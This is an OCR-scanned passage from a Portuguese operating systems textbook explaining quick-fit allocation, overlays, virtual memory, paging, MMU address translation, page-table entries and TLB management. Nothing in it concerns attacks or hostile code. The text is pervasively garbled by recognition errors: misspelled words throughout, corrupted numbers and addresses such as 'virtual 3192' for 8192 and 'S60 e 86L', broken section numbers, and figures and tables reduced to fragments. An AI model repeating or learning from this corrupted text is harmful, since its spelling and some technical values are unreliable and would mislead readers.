memória dispomyeis, como e ferio na Figura 3,6(c), esses 
próprios segmentos pudem ser u sad os para essa finalidade. 
A primeira palavra de cada segmentu de memória disponi- 
vel poderia conter o tamanho desse segmento, e a segunda 
palavra, um ponieiro para o segmentu dispomvcl seguintc. 
Os nos da lista da Figura 3.ć(c) — os ąuais neccssitam dc 
tres palavras c um bit (P/L) — nao seriam mais necessarios. 

Ainda cxiste outro algoritmo de alocaęao, denominado 
quick fit (cncaixc mais rapido), que mantem listas sepa- 
radas para algims dos tamanhos de segmentos dc memória 
disponiveis cm geral mais solicitados. Por exemplo, pense 
cm urna tabela com n entradas, na qual a primeira entrada 
seria urn ponieiro para u i nici o dc urna lista de segmentos 
de memória dlsponfveis de 4 KB; a segunda, um pomei- 
ro para inna lista de segmentos de 8 KB; a terceira, um 
ponieiro para urna lista de segmentos de 12 KB, e assirn 
por dianie. Os segmentos de memória dispomyeis de 21 KB 
poderiam ser colo ca dos na lista de segmentos dc memória 
dispomvris dc 20 KB ou cm unia lista de segmentos de 
tamanhos esperiais. 

Com o algoritmo ąukkfit , buscar um segmento de me¬ 
mória dispomvel dc um determinado tamanho e extrema- 
mente rapido, masapresenta a mesma desvantagem deto- 
dos os esąuemas que ordenam por tamanho dc segmentu, 
ou seja. ąuando um proccsso termina sua cxecnęao ou e 
removido da memória (dcvolvido ao disco ou ddetado), ć 
dispendioso descobrir ąuais sao os segmentos de memória 
vizinhos aos segmentos desse proccsso, a firn de verificar 
a posslbilidade de urna mistura de segmentos de memória 
disponfveis. Se a mistura nao for feita, a memória rapida- 
mente sera fragmentada cm urna grandę quantidade de 


minusculos segmentos dc memória dispomyeis, inuteis a 
qualqucr proccsso. 



Memória virtual 


Em bora registradores-basc c rcgistradores-lmitc pos¬ 
sani ser usados para criar a abstraęao de espaęos de ende- 
rcęamcnto, ha outro probiernia a ser resolvido: gcrcnciar o 
bloatwarc. 1 O tamanho das memórias esta aumentando ra- 
pidameme, mas u tamanho dos softwares esta aumentando 
mu i to mais rapido. Na decada de 1980, muitas imiyersida- 
des executavam um sistema de tempo compartilhado com 
dezenas de muarios (mais ou menos salisfeitos) simultane- 
os em um VAX 4 MB. Agora a Microsoft recomenda pelo 
menos 512 MB para que um rmico ttsuario do sistema Vista 
executc aplicaędes simples e 1 GB se estivcr fazendo algo 
serio. A lendencia a inultimfdia gera ainda mais demandas 
sobre a memória. 

Como cooseąuenria desses desenvoivimentos, ha a ne- 
cessidade de exeaiiar programas grandes demais para se en- 
caixarem na memória, e certamente ha a necessidade dc haver 
sistemas que possani dar su porte a multiplos programas em 
execuęao simultanea, cada um dos ąuais e componado pela 
memória iiidividualmente, mas que, coletiyamenie, excedam 
a memória. A troca dc processos nao c urna opęao airativa, 
visto que um disco SATA tfpico tem urna taxa dc iransfereuria 
de pico de, no maxirno, 100 MB/s, o que significa que leva 
pelo menos 10 segundos para sair de um programa de 1 GB 
e outros 10 segundos para inicializar um programa de 1 GB, 

O problema dc programas maiores que a memória esta 
presenle desdc o infdo da coniputaęao, ainda que cm areas 
limitadas, como cicncia e engenharia (a simulaęao da criaęao 
do universo ou mesmo a simulaęao de urna nova aeronave 
ocupam inuita memória). Uma soltięao adotada na decada 
dc 1960 foi a divisao do programa cm módulos, den ominą- 
dos sohreposieoes (cverhys) (módu los de sobreposięao}. 
Ouando mu programa era inicializado, tudo o que era car- 
regado na memória era o gerendador de sobreposięóes, que 
imediatamente carregavo e executava a sobreposięao 0 + Feito 
isso, de diria ao gerendador de sobreposięóes para carregar a 
sobreposięao l, seja ad ma da sobreposięao 0 na memória (se 
houvcsse cspaęo para dc), seja na parte superior da sobrepo¬ 
sięao 0 (sc nao houvesse cspaęo). Alguns sistemas de sobre- 
posi ęoes eram a I ta me me complexos, permitindo muitos so- 
breposięoes na memória ao mesmo tempo. As sobreposięóes 
eram mantidos cm disco c carrcgadas (ou rcmovidas) din a- 
micamente na memória pelo gerendador dc sobreposięóes. 

Embora o trabalho real de troca de sobreposięao do dis¬ 
co para a memória e vice-versa fosse feito pelo sistema ope- 
racional, a dmsao do programa em módulos tinha de ser 
feita manualmente pelo programador. A divisao de progra¬ 
mas grandes cm niódnlos menores era um trabalho lento, 
enfadonho c propenso a erros. Poucos programadores 


i o lenno utiljzado para definir softwares que nsam guamidades de memńria (N.R.T.). 
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eram bons nisso. Nao demorou muito para se pemar cm 
tambem atribuir essa tarefa ao computador. 

Para isso, loi conccbido um metodo (Fotberingham, 
1961), quc ficou conheddo como memória yirtual A 
idda basica por tras da memória yirtual e que cada programa 
tem scu próprio espaęo dc en dc regiment o, quc c dividido 
cm blocos chamados paginas. Cada pagina e urna serie eon- 
ifgua dc endereęos. Essas paginas sao mapeadas na memória 
lisica, mas nem todas precisatn estar na memória lisica para 
cxecu lar o programa. Quando o programa referenci a urna 
parte de sen espaęo de en dereęa niemo qne es ta na memória 
lisica, o hardware execnia o mapeamemo necessario dina- 
micamenie. Quandt> O programa referenda unia parte de 
sen espaęo de endereęamenio que nao esia em sita memória 
lisica, o sistema operadonal e akrtado para obier a parte quc 
falla e reexecuiar a instruęao que falhou. 

De certo modo, a memória virluai e urna generaliza- 
ęao da ideia do registrador-Iimite c do registrador-base. O 
8088 tinha registradores-base separados (mas nenhum re- 
gistrador-limite) para texto e dados. Com a memória yirtual, 
em vcz de realocaęao sępa rad a a pen as para os segmentos 
de tcxto e dados, o espaęo de endereęamento completo 
pode serinapeado na memória lisica em unidades razoavel- 
mente pecjuenas. Explicaremos como a memória yirtual e 
impiementada a seguir. 

A memória yirtual tambem fuiiciona bem em um sistema 
com muHiprogramaęao, com pedaęos e partes de diferentes 
programas simultaneamente na memória. Se um programa 
estiver esperando por outra parte de si próprio ser carregada 
na memória, a CPU podera ser dada a outro processo. 

3.3.11 Paginaęao 

A maioria dos sisteinas com memória virtua! utiliza 
urno tecnica denominada paginaęao. Em qualquer tom- 
putador existe um conjunio de endereęos de memória que 
os programas podem gerar ao serem executados. Quando 
um programa usa u ma instruęao do lipo 

MGV REG, 1000 

ele deseja copiar o contetldo do endereęo de memória 1000 
para o registrador REG (ou o contrario, dependendo do com¬ 
putador). Endereęos podem ser gerados com o uso da inde- 
xaęao, de registradores-base, registrudores de segmento ou 
ouiras lecnicas. 

Esscs endereęos gerados polo programa sao denomi- 
nados endereęos yirtuais e constituem o espaęo de en¬ 
dereęamento Yirtual Em computadores sem memória 
yirtual, o endereęo virtuai e idcntico ao endereęo lisico c, 
assim, para lei ou escrevei u ma posięao dc memória, dc e 
colocado direlamentc nobarramento da memória. Gnando 
a memória virtual e usada, o endereęo yirtual na o e coloca¬ 
do diretamenie no barramento da memória. Em vez disso, 
de vai a urna MM U (memory management unit — unidadc 
de gerendamento de memória), que mapeia endereęos vir- 
tuais em endereęos fisicos, como ilustrado na Figura 3.S. 


A CPU envia endereęos 



Barramenlo 


A MM U envia endereęos 
fisicos a memória 


Figura 3.6 A posięao e a funęao da MM u. Aqui aMMUe 
mostrada como parte do chip da CPU (processador) porque 
isso ó comum atuafmente. Contudo, em termos iógicos, 
poderia ser um chip separado, como ocorria no passado, 


Um exemplo mullo simples de como esse mapeamemo 
funciona e most rado na Figura 3.9. Nela, lemos um com¬ 
putador que pode gerar endereęos yirtuais dc 16 bits, dc 
0 a 64 K - 1. Contudo, esse computador tem somente 32 
KB de memória lisica. Assim, embora seja possfvd escre- 
ver programas dc 64 KB, eles na o podem ser toialmeiue 
carregados na memória para serem exccuiados. Urna có- 
pia completa do código do programa, de a te 64 KB, deve, 
emretanto, estar preserue em disco, de modo que partes 
possam ser carregada s di na mi ca mente na memória quan- 
do necessario. 

O espaęo de endereęamento yirtual e dMdido em uni¬ 
dades deriormnadas paginas tpąies). As unidades correspon- 
dentes na memória lisica sao denominadas moldnras de 
pagina (pagefranm) . As paginas e as moidurasdc pagina sao 
sempre do mesmo tamanho. No exemplo dado, as paginas 
leni 4 KB, mas paginas de 512 bytes a 64 KB tern sido uti- 
lizadas em sislemas rcais. Com 64 KB dc espaęo de endere- 
ęamcoto yirtual e 32 KB de memória lisica, podemos ter 16 
paginas virluais e oito molduras de pagina, As translcrcncias 
enire memória e disco sao sempre em paginas completas, 

A notaęao na Figttra 3.9 e a seguinie: a serie 0K-4K 
signiika qne os endereęos ifsicos ou yirtuais nessa pagina 
sao 0 a 4095. A serie 4K-SK refere-se aos endereęos 4096 a 
8191 e assim por dianie. Cada pagina eon tem exatamente 
4096 endereęos comeęando com um multiplo de 4096 e 
terminando antes de um multiplo de 4096, 

Quando um programa tema acessar o endereęo 0, por 
exernplo, u san do a instruęao 

MOV REG.0 

o endereęo Yirtual 0 e cnviado a MMII que dctccta quc 
esse endereęo yirtual situa-sc na pagina yirtual 0 (de 0 a 
4095), que, de acordo com scu mapeamento, corrcsponde 
b moldtira de pagina 2 (de 8192 a 12287). A MMU inms- 
forma, assim, o endereęo yirtual 0, que lite foi entregue 
peła CPU, no endereęo fisia) 8192 e o envia a memória por 
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Espaęo 
de endereęamento 
virtual 

60K-64K 
56K-60K 
52K-56K 
48K-52K 
44K-4SK 
40K-44K 
36K-40K 
32K-36K 
28K-32K 
24K-28K 
20K-24K 
16K-20K 
12K-16K 
BK-12K 
4K-8K 
0K-4K 



Estrutura da pagina 


Figura 3.9 A relaęao entre endereęos virtuais e endereęos 
de mennćria lisica e dada pefa tabela de paginas. Cada pagina 
comeęa com um muitipio de 4096 e termina 4095 endcreęos 
adma; assirrt, 4K-8K na verdade significa 4096-8191 e 
8K-12K significa 8192-12287. 


meio do barramento. A memória dcsconhecc a existericia 
da MMU e somente enxerga u ma sołicitaęao dc leiiura on 
escrita no endereęo 8192, a qual da exmita. Desse modo, 
a MM U mapeia lodos os endcreęos virluais de 0 a 4095 em 
endcreęos ffsicos localizados de 8192 a 12287. 

De maneira similar, a instmęao 

MOV REG r 8192 

e efet]vamente transformada em 

MOV REG,24576 

pois o endereęo virtual 3192 (na pagina virtual 2) esta ma- 
peado cm 24576 (na moldura de pagina fisica 6). Como 
ouiro excmplo, o endereęo virtua! 20500 esta localizado 
20 bytes depois do infcio da pagina virtual 5 (endcreęos 
virtnais de 20480 a 24575) e e mapeado no endereęo fisia) 
12288 + 20 = 12308. 

Por si só, essa habiiidade de mapear as 16 paginas vir- 
luais em ąualąuer urna das oito molduras de pagina, por 
meio da configuraęao apropriada do mapa da M MU, na o 
reso!ve o problcma de o espaęo de endereęameriio virlual 
ser maior do que a memória fisica dispomvel Como te- 
mos apenas oko molduras de pagina lisica, somente oito 
paginas virtnais da Figura 3.9 podern ser simultaneamente 
mapeadas na memória ffsica. As outras paginas, rotuladas 
com urn X na figura, naosao mapeadas. No hardware real, 
urn bit Presente/ausente em cada entrada da tabela de 


paginas informa se a pagina esta fisicamente presente ou 
nao na memória. 

O que a eon tece se urn programa tema usar u ma pagina 
viriua! nao mapeada, por exemplo, empregandoa instruęao 

MOV REG.3278G 

na qual 32780 corresponde ao decimo segundo byle den¬ 
im da pagina viruial 8 (que sc inida em 32768)? A MMU 
conslata que essa pagina viruial nao esta mapeada (o que 
e indicado por um X na figura) e foręa o dcsvio da CPU 
para o sistema operadonal Essa imerrupęao c denomi- 
nada falta de pagina (pagefault), O sistema operadonal, 
entao, cscolhc urna moldura de pagina [pageframe) pouco 
usada e a salva cm disco, ou seja, escreve scu conteudo de 
volta no disco (seja nao estieerla). Em seguida, de car- 
rega a pagina virmal referenci a da pcla insiruęao na mol¬ 
dura de pagina recem-libcrada, atualiza o mapeamenlo 
da tabela de paginas e reinirializa a insiruęao causadora da 
intcrrupęao. 

Por exemplo, se o sistema operadonal deddir cscolher 
a moldura de pagina 1 para ser substimfda, devera entao 
carregar a pagina vlrtuai 8 a partir do endereęo lisico 8192 
e fazer duasaheraęoes no rnapeamento da MMU. Primeiro, 
o sistema operadonal marcara, na tabela de paginas vir- 
tuais, a entrada da pagina virlual l como 'nao mapeada' 
e, consequemememe, quatquer acesso futuro a endcreęos 
v[rluais emre 4096 e 8191 provocara uma intcrrupęao do 
lipo falta de pagina. Em segukia, dc mai cara, na tabela de 
paginas viriuais, a entrada da pagina Wrlnal 8 como 'ma¬ 
peada' (substiim o X por I), de modo que, quando a ins¬ 
truęao causadora da intcrrupęao for fcexecutada, a MMU 
transformara o endereęo virtual 32780 no endereęo ffsico 
4108 (4096 + 12). 

Vamos dar uma olliada no fundonamento da MlMU 
para tambem en tender por que escolhcmos um tamanho de 
pagina que e unia potenria de 2, Na Figura 3.10 vemos um 
cxempk> de endereęo virtual, 8196 (0010000000000100 
cm binario), sendo mapeado por meio do emprego do ma- 
peamenio da MMU da Figura 3.9. O endereęo virtua! de 
16 bits que cłiega a MMU e nela dlvidido em um rut mero 
de pagina de 4 bits c um deslocamento de 12 bits. Com 4 bits 
para numero de pagina, podemos ter 16 paginas vin.ua i s e, 
com 12 bits para o deslocamento, e possn cl endereęar lo¬ 
dos os 4096 bytes dessa pagina. 

O mim er o da pagina e usado como um mdice para a 
tabela de paginas, a firn de obter a moldura dc pagina li¬ 
sica correspondente aąuela pagina virtual. Se o bil Presente/ 
iwsente da pagina vin.ua I estiver cm 0, ocorrera uma inter- 
rupęao do tipo falta dc pagina, de$viando-se, assirn, para o 
sistema operadonal. Sc o bil Presente/ausente estiver em 1, 
o numero da moldura dc pagina encontrado na tabela dc 
paginas sera copiado para os tres bits mais significativos do rc- 
gisirador dc salda, concatenando-os ao deslocamento dc 12 
bits, que e copiado sem alteraęao do endereęo virtuai 
de entrada. Juntos constitucm o endereęo ffsico de 15 bits da 
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| Figura 3,10 Gperaęśo interna da MM U com 16 pśginas de 4 KB. 


memória. O registrador de safda envia esse endereęo ffsico 
de 15 bits a memória por meio de urn barramento. 

3.5.21 Tabelas de paginas 

No caso mais sitnples, o map ea niemo dos endereęos 
yirtuais cm endereęos ffsicos pode ser resumido da seguin- 
te forma: o endereęo yirtual e dividldo em um niimero de 
pagina virtual (bits mais significatWos) c um dcslocamenlo 
(bits menos sigmfieativos). Por exemplo, com um endere¬ 
ęo de 16 bits c um iamanho dc pagina de 4 KB, os 4 bits 
supenores pode nam esperifkar urna demre as 16 paginas 
yirtuais e os 12 bits inferiores especificariam, en tan, o des- 
locamcnto do bytc (dc 0 a 4095) dentro da pagina selc* 
eionada. Contudo, tambem e possfyel uma divisao com 3 
ou 5 bits on algom ouiro nu mero dc bits para endereęa- 
menio de pagina. Diferentes divisoes implieam diferentes 
tamanhos de paginas, 

O nu mero da pagina yirtual e osado como indice den¬ 
tro da tabela de paginas para encontrar a entrada dessa la- 
bela assodada a pagina yirtual em ąuestao. A par lir dessa 
entrada, chega-se ao nu mero da moldura de pagina ffsica 
correspondente (caso ela ja exista). O niimero da moldura 
de pagina lisica e concatenado aos bits do deslocamenio, 
subsiitiiindo, assim, o niimero da pagina yirtual pelo da 


moldura de pagina ffsica, para formar o endereęo ffsico que 
sera enviado a memória. 

Desse modo, o objetivo da tabela de paginas e mapear 
paginas yirtuais em molduras de pagina ffsica. Ma temat i ca¬ 
nt en tc falando, a tabela de paginas e uma funęao que usa o 
rui mero da pagina yirtual como argumentu e leni o riumero 
da moldura de pagina ffsica correspondente como resultado. 
Usando o resullado dessa funęao, o campo que endereęa a 
pagina yirtual em um endereęo yirtual pode ser subsiituido 
pelo campo que endereęa a moldura de uma pagina ffsica, 
formando, assim, um endereęo da memória ffsica. 

Estrutura de uma entrada da tabela de paginas 

Passemos, en tao, da analise da estru tura das labelas 
dc paginas como um todo para o deialhamcnto dc uma 
(inka entrada da tabela de paginas. O esąuema e?cato de 
uma entrada e akamenle dependente da maquina, mas o 
tipo de informaęao preseme e aproximadameme o mesmo 
dc maquina para maquina. Na Figura 3.11 mostramos um 
exe rupio de uma entrada da tabela dc paginas. O iamanho 
varia tle um computador para o outro, mas 32 bits sao um 
Iamanho comum, O campo mais import antę c o Numero 
da moldura de pitym a. Afinal dc contas, o objctivo do ma- 
peamento dc paginas c localizar esse valor. Próximo a ele, 
lemos o bit Pmente/ausente. Se esse bit for I, a entrada sera 
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| Figura 3-11 Em rada tipica de urna tabela de paginas, 


V(51ida e podera ser usada. Se de for 0, a pagina virtual a 
qua! a entrada perlence nao estara preseme na memória 
no referido instante. O acesso a entrada da tabela de pagi¬ 
nas com esse bit em C causa unia laka de pagina. 

Os biLs dc proieędo dizem quais tipos de acesso sao per- 
mitidos a pagina. Em sua configuraęao mais simples, esse 
campo contem 1 bit, com 0 para leitura/escrita e 1 somente 
para leitura. U ma forma mais sofisticada tem 3 bhs, l bit para 
habilitac/desabilitar cada urna das operaęoes basicas na 
pagina: leitura, escrita e execuęao* 

Os bil s Modipcada e Rejermdada com roi a m o uso da pa¬ 
gina. Ao escrever na pagina, o hardware amomaticamenie 
faz o bil Modifkada igual a 1 na entrada correspondente da 
tabela dc paginas, Esse bit e importamc tjuaado o sistema 
operadortal dcci dc reivindicar urna moldura de pagina, Sc 
a pagina Esica dcntro dcssa moldura fot modificada (isto e, 
ficou 'suja'), da tambem dcvc ser atualizada no disco, Do 
contrario (isio t\ se continua 'limpa'), da pode ser sinipleś- 
menie abandonada, visto que a imagem em disco continua 
yalida. Esse bit e chamado algumas vezes de bit su jo, ja 
que refleie o estado da pagina. 

Ao bit Referendada c atribufdo o valor 1 quando a pa¬ 
gina fis i ca e rcferenciada, para leitura ou escrita. Esse bit 
aj u da o sisicma opera clona I a escolhcr urna pagina a ser 
substituida quando ocorre urna falta de pagina. As pagi¬ 
nas ffsicas que nao estao sendo utilizadas sao melhores 
candidatas do que as que estao, e esse bil desempenha 
um papel importante em varios dos algoritmos de substi- 
imęao de paginas que estudaremos posteriormentc, ainda 
neste capitulo. 

Por firn, o ultimo bil permite que o mecanismo de ca- 
che seja desabilitado para a pagina em ąuestao. Essa pro- 
priedade c mais importante para as paginas que mapeiam 
cm registradores dc dtspositivos do que na memória. Se o 
sistema operacional estiver preso em um laęo {hop) a es- 
pera da resposta de algom dispositivo dc E/S, e essencial 
que o hardware mantenha a busca da palavra a partir do 
dispositiyo, e nao a partir de urna cópia a miga da cache. 
Com esse bit, o uso da cache pode ser desabilitado. Ma- 
quinas com espaęos de endereęamenio separados para E/S 
e que nao usem E/S mapeada em memória nao prensam 
desse bil. 

Notę que o endereęo em disco empregado para arma- 
zenar a pagina ąuando esia nao esta presente na memória 


nao faz parte da tabela de paginas. A justificat!va para isso 
e simpies: a tabela de paginas contem somente as i n forma- 
ędes necessarias a o hardware para trądu zir um endereęo 
viilual cm um endereęo Esico. As informaęócs dc que o 
sistema operadonat precisa para trata r as fal las de pagina 
sao mantidas em tabela s em software dentro do sistema 
operacional, O hardware nao necessita dessas informaęles, 

Antes de passar a mais pro bierna s de implenientaęao, 
convćm cnfatizar novamenie quc o quc a memória virtual 
faz, funda niemal menie, e criar urna nova abstraęao — o 
espaęo de endereęamenio — o qual e urna abstraęao da 
memória Esica, assirn como um processo e urna abstraęao 
do processador Esico (CPU). A memória virtuai pode ser 
implementada dividindo o espaęo de endereęamenio vir~ 
tual em paginas c mapeando cada urna ddas em algnma 
moldura dc pagina da memória Esica ou nao mapcando- 
-as (temporariamente). Dcssa forma, este capitulo e baska- 
menie sobie urna absiraęao criada pelo sistema operacional 
e sobre como essa abstraęao e gerendada. 

5331 Acelerando a paginaęao 

Acabamos de ver os princfpios basicos da memória vir- 
tual e da paginaęao. Agora entraremos em detalhes sobre 
irnpleinemaęoes possfvcis. Em qualquer sistema de pagi¬ 
naęao, dois próbie mas importantes devem serenfrentados; 

1. O mapea niemo do endereęo virtual para endereęo 
Esico devc ser rapldo. 

2, Se o espaęo de endereęo virtual for grandę, a tabela 
dc paginas sera grandę. 

O primeiro porno e consequencia do falo de que o ma - 
peamento virtual-Esico deve ser feiro em cada referenda a 
memória, Em ultima i ns lancia, todas as instruęóes devem 
vir da memória c muitas dclas referendam operandos na 
memória tambem, Conscąuentementc, e necessario fazer 
urna, duas ou algumas vezes mais relcrencias a tabela de 
paginas por instruęao. Se a execuęao de unia instruęao leva 
i ns, por exemplo, a busca na tabela de paginas deve ser 
feita em me nos de 0,2 ns para evitar que o mapeamento se 
torne um gargalo significativo. 

O segundo ponto decorre do fato de que todos os com- 
putadores modernos usam endereęos virtuais de pele me- 
nos 32 bits, com 64 biis se tornando cada vez mais comuns. 
Com um tamanho de pagina de 4 KB, por exemplo, um 
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espaęo de endereęos de 32 bits leni 1 milhao de paginas, e 
um espaęo de endereęos de 64 bils tem mais do que voce 
gostaria de considerar. Com 1 milhao de paginas no espa¬ 
ęo de cndereęamento virtuaJ F a tabela de paginas deve ier 
1 milhao de entradas. E lembrc-se dc que cada proccsso 
prccisa dc sua própria tabela de paginas (porąuc tein seu 
próprio espaęo dc cndercęo virtual). 

A necessidade de extensos e rapidos mapeamentos 
de paginas e urna rcstrięao signifkaliva ao modo como 
os coniputadores sao construfdos. G projeto mais simples 
(pelo nienos em termos conceituais) e ter unia tabela de 
paginas consistindo de um arranjo de registradores de hard¬ 
ware rapidos, com urna entrada para cada pagina virtuab 
indexada pelo mi mero dessa pagina, como mosirado na 
Figura 3.10, Qnando um proccsso e inicializado, o siste- 
ina operacional carrega os registradores com a tabela dc 
paginas do proccsso, re tira da de tima cópia man tida na 
memória prinripal. Duranie a execuęao do proccsso, nao 
sao mais necessarias referencias ci memória para a tabela dc 
paginas, As vanlagens desse proccsso sao que dc e direto e 
nao requer referencias a memória duranie o mapeamenio. 
Uma desvaniagem e que e excessivamente caro se a tabela 
de paginas lor grandę, Gulra desvantagem ć quc a necessi¬ 
dade dc carregar a tabela de paginas completa a cada alter- 
nancia de contexto p rej u di ca o desempenho* 

JSIo ouiro extremo, a tabela dc paginas pode estar intci- 
rameme na memória principal. Tu do de qneo hardware pre- 
cisa, nesse caso, e de um registrador unico que apomc para 
o inicio da tabela dc paginas. O projeto perm i te que o mapa 
virtual-lisico seja muclado em uma alternancia dc comexto 
por meio do carregamento de urn registro. Naturalmeme ha 
a desvamagem de requerer unia ou mais referencias a me- 
mória para ler as entradas na tabela de paginas durante a 
execuęao de cada instruęao, tornando-a mnito lenta. 

TLB ou meinótia associativa 

Examinemos agora esqucmas amplamentc implemen- 
tados para acclcrar a paginaęao c para Udar com grandes 
espaęos de endcreęamento vinual comeęando com o pri- 
meiro lipo, O ponto de partida da maior parte das lecnicas 
dc otimizaęao c o posicionamento da tabela de paginas na 
memória. Potencialmeme, essa decisao tem um enorme 
impacto no desempenho. Considere, por exemplo, uma 
instruęao de l byle que copie o conteudo de um registrador 
para ouiro. Na ausenda de paginaęao, essa instruęao faz um 
unico acesso a memória para buscar a própria instruęao. 
Com a paginaęao, sera necessaria pelo nienos uma referen¬ 
da adicional a memória para acessar a tabda dc paginas. 
Como a yelocidade dc cxccuęao gcralmcnte c limitada pcla 
frcąuencia com quc a CPU pode acessar instruędes c dados 
na memória, o falo dc haver a necessidade dc dois accssos 
a memória por referenda a memória retluz o desempenho 
pela tneiade. Ncssas condięoes, ninguem usaria pagmaęao* 

Os projetistas de coniputadores estudam csse problema 
ha anos c encontraram uma soluęao, com basc na obscrva- 
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ęao de que a maioria dos programas tende a fazer um grandę 
nu mero de referencias a um mesmo pequeno conjimto 
de paginas virtuais. Assim, somente inna reduzida parte 
das entradas da tabela de paginas e intensamente lida; as 
entradas restantes raramente sao rcfcrencia das. 

A solu ęao concebida foi eąuipar os coniputadores com 
um peąueno dispositivo em hardware para mapear os en¬ 
dereęos virtuais para endereęos ffsicos sem passar pela ta¬ 
bela de paginas. Esse dispositivo, denominado TLB {trans- 
lation lookaside łniffer — buffer para traduęao de endereęos) 
ou as vezcs memória associativa, ć ilustrado na Tabela 
3.1. Essc dispositivo geralmentc sc localiza dentro da MMU 
c conslstc cm um pcqueno numero dc entradas — oito no 
excmpIo dado— r mas raramente mais do quc 64, Cada cn- 
I rada eon tern mfonnaęócs sobrc uma pagina — induindo 
o nii mero da pagina virtual — um bit qtie e tolocado cm l 
q u a ndo a pagina e modiflcada, o código de proteęao {per- 
missao de leitLira/escrita/execuęao) e a moldura de pagina 
em que esta localizada. Esses campos tem uma correspon- 
dencia de um para um com os campos na tabela de paginas, 
exceto para o numero de pagina virtual, que nao e neces- 
sario na tabda de paginas. Ouiro bil indica se a entrada e 
valida (em uso) ou nao. 

Um exemplo que pode gerar a TLB da Tabela 3.1 e um 
processoem um laęo (hop) que referenda constantememe 
as paginas virtuais 19, 20 e 21, de modo qne essas entra- 
das na TLB apresentam código de proteęao para leitura e 
execuęao. Os dados principais referenciados em um dodo 
iiistante (por exemplo, um arranjo) estao localizados nas 
paginas 129 c 130, A pagina 140 contem os indiccs usados 
no processamcnto desse arranjo. Por firn, a pilha loca!iza-se 
nas paginas S60 e 86L 

Yejanios agora como a TLB fu ndo na. Quando um ende- 
reęo virtual e apresentado a MMU para traduęao, o hardware 
primeiro verifica se o numero de sua pagina virtual esta pre- 
sente na TLB comparando-o com todas as entradas da TLB 
simuitaneamenie (isto e, em paralelo}* Se unia corrcspon- 
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| Tabela 3*1 Uma TLB para acelerar a paginag^o. 
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dencia valida e en contra da e o acesso nao viola os bits de 
proteęao, o numero da moklura de pa giną e, entao, obtido 
diretamente da TLB, sem necessidade de bitsca-lo na tabela 
dc paginas. Sc o numero da pagina virutai estivcr prcscnte 
na TLB, mas a instmęao estivcr ten Lando escrcver cm oma 
pagina que permita semenie Leitura, nma laka por violaęao 
dc proteęao (prokction fauli) c gerada. 

£ interessante notar o que acomecc quando o n u me¬ 
ro da pagina virLua! nao esta prcscnte na TLB. A MM U 
detecia a ausćncia dc pagina (pa$e miss) c, en la o, faz 
uma Luisca comum na tabela de paginas. A MM U en ta o 
destitui uma das eniradas da TLB e a substitul por cssa 
cnlrada da tabela de paginas que a ca bo u dc ser buscada. 
Assim, sc a mes ma pagina virtual for referenciada nova- 
mente, havcra uma presenęa de pagina {page hit) cm vez 
de uma ausencia de pagina, Quando uma cnlrada ć rc- 
lirada da TLB, apenas o bil modificado dcve ser eopiado 
dc voJut na cnlrada correspondcnte da tabela dc paginas 
na memória. Os demais valorcs ja estao la, cxceio o bil 
referenciado. Quando uma cnlrada da TLB e carregada a 
partir da Labela dc paginas, lodos os campos dessa cm ra¬ 
da dcvem ser trazidos da memória. 

Gerendamento da TLB por software 

Ale agora temos partfdo do pressuposto de que toda 
maąuina eom memória virtual paginada tern reconhecL 
mento por hardware das ta bela s de paginas e Lambem uma 
TLB. Nesse projeto, o gerenciamemo c o tratameitto das 
faltas na TLB san totał menie fest os pdo hardware da MM U. 
Interrupęoes para o sistema operadonal só ocorrem quan- 
do uma pagina nao esta na memória. 

Antigamente essa suposlęao era verdaddra. Boje, po¬ 
rem, muitas das maąumas RISC, dentre das SPARC, MIPS, 
Alpha c HP PA, fazom quasc todo esse gerendamento por 
software, Nessas liiaąuinas, as eniradas da TLB sao expli- 
dtamente carregadas pclo sistema operadonal. (Juando 
ocorre uma ausencia dc pagina na TLB, cm vez de a própria 
MM U buscar na tabela dc paginas a pagina virtual reąuisi- 
tada, da apenas gera uma interrupęao e repassa o proble- 
ma a o sistema operadonal. Este devc, entao, encontrar a 
pagina eirtual na tabela dc paginas, destimir uma das cn- 
iradas da TLB, inserir af a nova pagina viriual c reinidalizar 
a imiruęao inierronipida. Qbviamente, ludo isso deve ser 
Iciio para muitas insliyęocs, pois as auscncias de pagina na 
TLB ocorrem runko mais [reąuentemente do que as faltas 
de paginas na tabela de paginas. 

Mas, se a TLB for sufidentemenlc grandę (digamos, 
com 64 eniradas) para que sc reduza a taxa dc auscncias de 
pagina, o gerenciamemo da TLB por software acaba Lendo 
unia efidenda aceitavel O ganho principal aqui e ter uma 
MM U muito mais simples, o que libera bastante area no 
chip da CPU para caches e outros recursos qtie possam me* 
lhorar o desempenho. O gerenciamemo da TLB por soft¬ 
ware e distutido por Uhlig et al. (1994), 


Diversas estrategias tern sido desenvolvidas para me- 
lliorar o desempenho de maąuinas que fazem o gerenria- 
mento da TLB por software. Uma delas tenta tanto rednzir 
o numero de ausendas de pagina na TLB quanto o ciisto 
dessas auscncias ąttando clas ocorrem (Bała et al,, 1994). 
Para reduzir o numero de auscncias na TLB, muitas vczcs 
o sistema operadonal pode usar sua Intuięao' para dcsco- 
brir ąiiais paginas virtuais tern mais probabilidade de serem 
usadas e, entao, antedpar seu carrcgamento na TLB. Por 
exemplo, quando um processo clienie eiwia uma mensa- 
gem a um processo de servidor na mesma maąuina, e bem 
provavel que o processo de servidor tenha de ser execma- 
do logo. Sabendo desse lato, enąuanio o pro cessa niemo e 
desviado para o send, o sistema operadonal lambem pode 
verifiear onde se encontram as paginas do código, os dados 
e a pilha do processo dc semdor e, entao, mapca-los ant es 
que eles possam provocar auscncias dc pagina na TLB, 

O modo norma! de tratar uma ausencia de pagina na 
TLB, seja por hardware, seja por software, e aeessar a la¬ 
bela de paginas e executar as operaęoes de indexaęao para 
localizar a pagina referenciada nao encomrada na TLB. O 
problema cm se fazer essa pesquisa por software c que as 
paginas que contcm a tabela dc paginas podcm nao estar 
mapcadas na TLB, ocasionando auscncias adidonais na 
TLB durantc o processamcnto, Essas auscncias podcm ser 
reduzidas se uma grandę cache (de 4 KB, por exemplo), 
gerenciada por software e comendo eniradas do lipo TLB, 
for mantida cm uma localizaęao fixa com sua pagina sem- 
pre mapeada na TLB. Verificando primeiro essa cache, o 
sistema opera ci o na 1 pode reduzir substancja Imenie as au- 
sencias de pagina na TLB. 

Q u and o o gerendamento da TLB por software e usa- 
do, e essencial comprecnder a diferenęa enu e dois lipos 
de ausencia. Uma ausencia leve (soft miss) ocorre ąuandu 
a pagina referenciada nao esta na TLB, mas na memória. 
Aqui e necessario apenas aiualizar a TLB, e os discos de E/S 
nao sao utilizados. Normalmeme, urna ausencia tetnpora- 
